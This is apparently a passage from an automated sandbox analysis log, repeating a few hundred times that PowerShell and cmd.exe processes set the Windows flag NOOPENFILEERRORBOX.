                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
